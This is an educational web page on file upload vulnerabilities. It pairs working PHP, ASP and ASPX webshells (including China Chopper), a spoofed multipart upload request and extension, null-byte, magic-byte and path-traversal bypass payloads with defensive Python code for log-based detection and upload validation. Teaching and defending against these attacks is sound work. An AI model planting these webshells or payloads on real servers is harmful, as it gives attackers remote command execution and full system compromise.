File Upload Vulnerability

πŸ‘¨β€πŸ’» Attacker shell.php <?php system($_GET['cmd']); ?> Webshell Malicious File πŸ“€ Upload Function No Validation πŸ—„οΈ Web Server RCE Achieved

File upload vulnerabilities occur when web applications allow users to upload files without properly validating the file type, content, or name. This can lead to remote code execution, defacement, phishing, or complete system compromise.


Understanding File Upload Attacks

Attackers exploit file upload functionality to upload malicious files (webshells, backdoors, malware) that can be executed on the server, leading to complete system compromise.

Types of File Upload Attacks

[Figure: File Upload Attack Types]

1. Unrestricted File Upload

No validation whatsoever - the most dangerous scenario.

# PHP Webshell (simple.php)
<?php system($_GET['cmd']); ?>

# Usage: http://victim.com/uploads/simple.php?cmd=whoami

# More advanced webshell
<?php
if(isset($_POST['cmd'])) {
    echo "<pre>" . shell_exec($_POST['cmd']) . "</pre>";
}
?>
<form method="POST">
    <input type="text" name="cmd">
    <input type="submit" value="Execute">
</form>

2. Client-Side Validation Bypass

Applications relying only on JavaScript validation can be easily bypassed.

# Vulnerable JavaScript validation (runs only in the browser, so the server never sees it)
function validateFile(file) {
    var ext = file.name.split('.').pop().toLowerCase();
    if(ext != 'jpg' && ext != 'png') {
        alert('Only JPG/PNG allowed!');
        return false;
    }
    return true;
}

# Bypass methods:
1. Disable JavaScript in browser
2. Intercept request with Burp Suite and modify extension
3. Use curl/wget to upload directly

3. MIME Type Bypass

# Server-side MIME type check (vulnerable: the type comes from the client's Content-Type header)
if($_FILES['file']['type'] != 'image/jpeg') {
    die('Only JPEG allowed!');
}

# Bypass: Modify the part's Content-Type header in the POST request
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg          <-- Modified to bypass check

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--

Advanced Bypass Techniques

[Figure: File Upload Bypass Techniques]

Extension Bypass Methods

# Double extension
shell.php.jpg
shell.jpg.php

# Null byte injection (PHP < 5.3.4)
shell.php%00.jpg
shell.php\x00.jpg

# Case manipulation
shell.PHP
shell.PhP
shell.pHp

# Alternate extensions
PHP: .php, .php3, .php4, .php5, .phtml, .pht
ASP: .asp, .aspx, .cer, .asa
JSP: .jsp, .jspx, .jsw, .jsv, .jspf
Perl: .pl, .pm, .cgi, .lib

# Appending dots/spaces (Windows)
shell.php.
shell.php (trailing space)
shell.php::$DATA

Magic Bytes Manipulation

# Add image headers to webshell
GIF89a; # GIF header
<?php system($_GET['cmd']); ?>

# JPEG header
\xFF\xD8\xFF\xE0
<?php system($_GET['cmd']); ?>

# PNG header
\x89PNG\r\n\x1a\n
<?php system($_GET['cmd']); ?>

Path Traversal in Upload

# Upload to different directory
filename="../../shell.php"
filename="../../../var/www/html/shell.php"

# Windows path traversal
filename="..\..\..\..\shell.php"

# URL encoding
filename="..%2F..%2Fshell.php"

Webshell Types

PHP Webshells

# One-liners
<?php system($_GET['cmd']); ?>
<?php eval($_POST['cmd']); ?>
<?php @eval($_POST['cmd']); ?>   # the @ suppresses error output

# China Chopper (famous mini webshell)
<?php @eval($_POST['chopper']); ?>

# File manager webshell
<?php
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$files = scandir($dir);
foreach($files as $file) {
    echo $file . "<br>";
}
?>

ASP/ASPX Webshells

# ASP Classic
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oExec = oScript.Exec("cmd /c " & Request("cmd"))
Response.write(oExec.StdOut.ReadAll())
%>

# ASPX
<%@ Page Language="C#" %>
<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>

[Figure: Webshell Deployment]

Exploitation Tools

  • Weevely: Weaponized web shell with 30+ modules
  • WSO (Web Shell by Orb): Feature-rich PHP webshell
  • b374k: PHP webshell with file manager
  • C99 Shell: Classic multipurpose webshell
  • AntSword: Modern cross-platform webshell manager
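Once a webshell is deployed it has to be used, and that use shows up in the web server's access log: requests that reach a script extension under the upload directory, POSTs to a stored upload (the form-based and China Chopper shells above read their command from POST), and command-style query parameters such as the `cmd` used by the one-liner shells. The following detection logic is an added example, not code from the original page; it runs over constructed Apache combined-format log lines and assumes the upload directory is served at `/uploads/` (both the sample lines and that path are assumptions).

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined-log format; they are not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "POST /upload HTTP/1.1" 200 211 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /uploads/simple.php?cmd=whoami HTTP/1.1" 200 34 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "POST /uploads/avatar.phtml HTTP/1.1" 200 980 "-" "python-requests/2.31"',
    '10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /uploads/report.pdf HTTP/1.1" 200 88012 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:01:30 +0000] "GET /uploads/shell.php.jpg?cmd=id HTTP/1.1" 404 196 "-" "curl/8.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_PREFIX = "/uploads/"          # assumed URL path of the upload directory
SCRIPT_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "pht", "asp", "aspx", "cer", "asa",
    "jsp", "jspx", "jsw", "jsv", "jspf", "pl", "pm", "cgi", "lib",
}
COMMAND_PARAMS = {"cmd", "exec", "command", "chopper"}   # parameter names the one-liner shells read


def analyze_line(line: str) -> Dict:
    """Parse one log line and list the reasons it looks like webshell activity (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return {}
    url = urlsplit(m["target"])
    reasons: List[str] = []
    if url.path.lower().startswith(UPLOAD_PREFIX):
        # Every extension segment matters: shell.php.jpg still carries "php".
        segments = url.path.rsplit("/", 1)[-1].lower().split(".")[1:]
        hits = [s for s in segments if s in SCRIPT_EXTENSIONS]
        if hits:
            reasons.append("script extension under upload dir: " + ", ".join(hits))
        if m["method"] == "POST":
            reasons.append("POST to a stored upload")
        params = set(parse_qs(url.query, keep_blank_values=True)) & COMMAND_PARAMS
        if params:
            reasons.append("command-style parameter: " + ", ".join(sorted(params)))
    status = int(m["status"])
    # A 2xx on a script path means the server executed or served it; a 403/404 is an attempt.
    severity = "none" if not reasons else ("high" if 200 <= status < 300 else "medium")
    return {
        "ip": m["ip"],
        "timestamp": m["ts"],
        "target": m["target"],
        "status": status,
        "severity": severity,
        "reasons": reasons,
    }


def find_webshell_activity(lines: List[str]) -> List[Dict]:
    """Return the records that carry at least one reason, in log order."""
    return [rec for rec in (analyze_line(l) for l in lines) if rec and rec["reasons"]]


def count_by_ip(findings: List[Dict]) -> Dict[str, int]:
    """Group findings by source address so a single operator stands out."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in find_webshell_activity(SAMPLE_ACCESS_LOG):
        print(f["severity"], f["ip"], f["target"], "; ".join(f["reasons"]))
```

On the constructed sample the clean image and PDF requests and the legitimate POST to `/upload` produce nothing, while the three requests from 10.0.0.9 are flagged; the 404 on `shell.php.jpg` is reported at lower severity because the server did not serve it, but it still shows someone probing the upload directory and is worth an alert on its own.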

Defense Strategies


Secure File Upload Implementation

Implementing multiple layers of validation and security controls is essential.

1. Whitelist File Extensions

# PHP example
$allowed = array('jpg', 'jpeg', 'png', 'gif');
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if(!in_array($ext, $allowed)) {
    die('Invalid file type!');
}

2. Content Validation

  • Verify file content matches extension (magic bytes)
  • Use image processing libraries to validate images
  • Scan files with antivirus

3. Secure File Storage

# Store files outside web root
/var/uploads/ (not accessible via web)

# Rename files to random names
$newname = bin2hex(random_bytes(16)) . '.' . $ext;

# Set proper permissions
chmod 0644 uploaded_file # owner read/write, everyone else read-only, never executable

# Disable script execution in upload directory
# .htaccess:
php_flag engine off
AddType text/plain .php .php3 .phtml

4. Additional Controls

  • Implement file size limits
  • Use Content Security Policy headers
  • Implement rate limiting
  • Log all upload activities
  • Regular security audits
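Steps 1 to 3 above, taken together, are what defeat the extension, null-byte, case, double-extension, MIME, magic-byte and path-traversal tricks listed under Advanced Bypass Techniques. The validator below is an added example written for this page and is not code from the original; it is language-independent logic shown in Python rather than PHP. It assumes a 2 MB size limit, an image-only whitelist, and a temporary directory standing in for the out-of-web-root `/var/uploads/`; the sample bytes are constructed, not a real image.

```python
import os
import secrets
import tempfile

# Allowed extensions mapped to the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Server-side script extensions that must not appear as any extension segment.
SCRIPT_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "pht",
    "asp", "aspx", "cer", "asa",
    "jsp", "jspx", "jsw", "jsv", "jspf",
    "pl", "pm", "cgi", "lib",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024   # assumed limit


class UploadRejected(ValueError):
    """Raised with a short reason when an upload fails validation."""


def validate_upload(client_filename: str, data: bytes) -> str:
    """Validate an upload and return the lowercase extension it may be stored under."""
    name = client_filename
    # Null bytes (raw or URL-encoded) and NTFS stream markers (::$DATA) are never legitimate.
    if "\x00" in name or "%00" in name.lower() or "::" in name:
        raise UploadRejected("illegal characters in filename")
    # Keep only the final path component, so ../ and ..\ sequences never reach the filesystem.
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows drops trailing dots and spaces on file creation; strip them before checking.
    name = name.strip(" .")
    parts = name.lower().split(".")
    if len(parts) < 2 or not all(parts):
        raise UploadRejected("filename needs a name and an extension")
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:          # case-insensitive whitelist: shell.PhP is still php
        raise UploadRejected(f"extension .{ext} is not allowed")
    # shell.php.jpg: an inner script extension may still be executed by a misconfigured server.
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:-1]):
        raise UploadRejected("double extension with a script type")
    if not data or len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("empty or oversized file")
    # Content must match the claimed type; the client's Content-Type header is never consulted.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the claimed type")
    return ext


def is_accepted(client_filename: str, data: bytes) -> bool:
    """True if the upload passes every check above."""
    try:
        validate_upload(client_filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(client_filename: str, data: bytes, upload_root: str) -> dict:
    """Validate, then write under a random name; upload_root is meant to be outside the web root."""
    ext = validate_upload(client_filename, data)
    stored_name = secrets.token_hex(16) + "." + ext      # 32 hex chars plus the vetted extension
    dest = os.path.join(upload_root, stored_name)
    # O_EXCL never overwrites an existing file; 0644 keeps the file non-executable.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(dest, 0o644)
    return {"original": client_filename, "stored_as": stored_name, "path": dest, "bytes": len(data)}


def demo() -> dict:
    """Store a constructed JPEG-like blob in a temp dir standing in for /var/uploads."""
    upload_root = tempfile.mkdtemp(prefix="uploads-")
    sample_jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64   # constructed, not a real photo
    return store_upload("holiday-photo.JPG", sample_jpeg, upload_root)


if __name__ == "__main__":
    print(demo())
```

One caveat the code makes visible: a file named `cat.gif` whose content begins with `GIF89a` passes the magic-byte check even if script text follows the header, exactly as the Magic Bytes Manipulation section describes. Content checks narrow the attack surface but do not close it; the random rename, the storage location outside the web root, and the disabled script engine in the upload directory are what make a surviving polyglot inert.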

Ethical Testing Only

This information is for educational purposes and authorized penetration testing only. Unauthorized exploitation is illegal.

HackHub Professional Services


Expert File Upload Security Testing

The HackHub team provides comprehensive file upload security assessments, identifying vulnerabilities and implementing robust defenses. With 10+ years of experience, we help secure your upload functionality against sophisticated attacks.

Contact [email protected] for professional security services.

Conclusion

File upload vulnerabilities remain a critical attack vector that can lead to complete system compromise. Implementing comprehensive validation, secure storage practices, and regular security testing are essential for protecting web applications from file upload attacks.